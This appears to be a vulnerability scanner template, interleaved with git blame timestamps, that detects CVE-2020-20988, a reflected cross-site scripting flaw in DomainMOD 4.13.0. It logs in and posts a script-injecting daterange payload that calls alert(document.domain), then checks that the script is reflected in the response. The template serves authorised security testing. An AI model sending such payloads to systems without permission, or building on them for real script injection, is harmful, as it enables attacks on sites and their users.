2022-07-16 07:53:00 +00:00
|
|
|
id: CVE-2020-20988
|
2022-08-22 07:17:05 +00:00
|
|
|
|
2022-07-16 07:53:00 +00:00
|
|
|
info:
|
|
|
|
name: DomainMOD 4.13.0 - Cross-Site Scripting
|
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
|
|
|
description: |
|
2022-08-16 14:14:41 +00:00
|
|
|
DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
|
2022-07-18 07:58:56 +00:00
|
|
|
reference:
|
2022-07-16 07:53:00 +00:00
|
|
|
- https://mycvee.blogspot.com/p/xss2.html
|
2022-08-16 14:14:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-20988
|
2022-07-18 07:58:56 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 5.4
|
|
|
|
cve-id: CVE-2020-20988
|
|
|
|
cwe-id: CWE-79
|
2022-07-18 07:21:56 +00:00
|
|
|
metadata:
|
2022-07-18 07:58:56 +00:00
|
|
|
verified: "true"
|
2022-07-16 07:53:00 +00:00
|
|
|
tags: cve,cve2020,domainmod,xss,authenticated
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
new_username={{username}}&new_password={{password}}
|
|
|
|
- |
|
|
|
|
POST /reporting/domains/cost-by-owner.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2022-07-18 07:21:56 +00:00
|
|
|
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
2022-07-16 07:53:00 +00:00
|
|
|
|
|
|
|
cookie-reuse: true
|
2022-07-18 07:44:49 +00:00
|
|
|
req-condition: true
|
2022-10-07 21:27:25 +00:00
|
|
|
host-redirects: true
|
2022-07-16 07:53:00 +00:00
|
|
|
max-redirects: 2
|
|
|
|
matchers:
|
2022-07-18 07:21:56 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_2 == 200'
|
|
|
|
- 'contains(all_headers_2, "text/html")'
|
|
|
|
- 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
|
2022-07-18 07:44:49 +00:00
|
|
|
- 'contains(body_2, "DomainMOD")'
|
2022-07-18 07:21:56 +00:00
|
|
|
condition: and
|
2022-08-16 14:14:41 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/14
|